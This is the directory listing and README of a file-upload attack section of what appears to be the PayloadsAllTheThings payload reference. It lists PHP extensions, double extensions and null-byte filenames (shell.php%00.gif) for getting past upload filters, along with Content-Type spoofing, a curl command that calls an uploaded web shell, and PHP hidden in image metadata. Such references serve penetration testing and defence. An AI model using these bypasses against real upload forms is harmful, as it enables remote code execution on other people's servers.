PayloadsAllTheThings/Upload insecure files
2019-02-15 16:00:50 +01:00
..
Configuration Apache .htaccess File upload - merging old files 2019-02-15 16:00:50 +01:00
Configuration Busybox httpd.conf File upload - merging old files 2019-02-15 16:00:50 +01:00
Configuration IIS web.config File upload - merging old files 2019-02-15 16:00:50 +01:00
Configuration Python __init__.py File upload - merging old files 2019-02-15 16:00:50 +01:00
CVE Eicar File upload - merging old files 2019-02-15 16:00:50 +01:00
CVE Ffmpeg HLS File upload - merging old files 2019-02-15 16:00:50 +01:00
CVE Image Tragik File upload - merging old files 2019-02-15 16:00:50 +01:00
CVE ZIP Symbolic Link File upload - merging old files 2019-02-15 16:00:50 +01:00
Extension Flash File upload - merging old files 2019-02-15 16:00:50 +01:00
Extension PDF JS File upload - merging old files 2019-02-15 16:00:50 +01:00
Extension PHP File upload - merging old files 2019-02-15 16:00:50 +01:00
Picture Metadata File upload - merging old files 2019-02-15 16:00:50 +01:00
Picture Resize File upload - merging old files 2019-02-15 16:00:50 +01:00
Server Side Include File upload - merging old files 2019-02-15 16:00:50 +01:00
README.md File upload - merging old files 2019-02-15 16:00:50 +01:00

Upload

Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Exploits

PHP Extension

.php
.php3
.php4
.php5
.php7

Less known extensions
.pht
.phar
.phpt
.pgif
.phtml

Double extensions
.jpeg.php
.jpg.php
.png.php

Upload tricks

  • Null byte (eg: shell.php%00.gif, shell.php%00.png)
  • Mime type, change Content-Type : application/x-php or Content-Type : application/octet-stream to Content-Type : image/gif

Picture upload with LFI

Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : curl 'http://localhost/test.php?0=system' --data "1='ls'".

  • Picture Metadata, hide the payload inside a comment tag in the metadata.
  • Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating getimagesize() and imagecreatefromgif().

Configuration Files

  • .htaccess
  • web.config
  • httpd.conf
  • __init__.py

CVE - Image Tragik

HTTP Request
Reverse Shell
Touch command

References